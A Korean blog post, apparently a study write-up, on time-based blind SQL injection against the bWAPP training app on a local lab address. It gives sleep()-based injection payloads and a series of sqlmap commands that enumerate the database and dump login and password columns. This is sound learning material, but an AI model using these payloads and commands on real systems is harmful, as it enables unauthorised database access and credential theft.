모의해킹

SQL Injection - Blind - Time-Based

editor9386 2025. 2. 13. 12:09

이전 글과 같은 blind sql 방식이다. 

안의 박스에 내용을 입력하면 영화가 있는지 없는지를 e-mail로 전송해 주어서 바로 내가 입력한 값이 참인지 거짓인지 구분할 수 없다.

 

따라서 sleep()이라는 함수를 사용할 것인데 

sleep() 함수는 ()안에 들어간 초만큼 출력 결과가 지연된다.

 

'or 1=1 and sleep(1)# 처럼

앞 부분이 참 이이면 sleep 함수가 실행되어서 이메일 전송이 살짝 지연이 되고

 

'or 1=0 and sleep(1)# 처럼

뒷 부분이 거짓이면 sleep함수는 실행 되지 않으므로 지연 없이 바로 출력값이 나오게 될 것이다. 

 

이 방식으로 참과 거짓을 구분하여 blind 인젝션 방식을 사용한다

 

' or 1=1 and length(database())=5 and sleep(1)#

내용은 이전 글과 같은 내용이니 생략

 

sqlmap 을 사용하여서 이런 노가다 없이 쉽게 뚫을 수도 있다

 

# sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"

--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title" --dbs

--batch --threads=5 --level=5 --risk=3

 

* --dbs : 데이터베이스 리스트 출력

*  --batch : 명령어 수행 중 질문에 default 값으로 답함

*  --threads : 공격 수행하는 thread 개수를 지정

*  --level=5 --risk=3 : 최고 레벨의 공격까지 수행

 

 

sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"

--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"

--batch --threads=5 --level=5 --risk=3 -D "bWAPP" --tables

* -D : 데이터베이스 지정

* --tables : 테이블 목록을 출력

 

 

sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"

--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"

--batch --threads=5 --level=5 --risk=3 -T "heroes" --columns

* -T : 테이블 지정

* --columns : 컬럼 목록 출력

 

 

 

sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"

--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"

--batch --threads=5 --level=5 --risk=3 -T "heroes" -C id,login,password --dump

* -C : 컬럼 지정

 

'모의해킹' 카테고리의 다른 글

XML/Xpath injection - Search  (0) 2025.02.23
XML/XPath Injection (Login Form)  (0) 2025.02.20
페이로드  (0) 2025.02.12
SQL injection - blind (Boolean-Based)  (0) 2025.02.12
XSS - Stored (Blog)  (0) 2025.02.12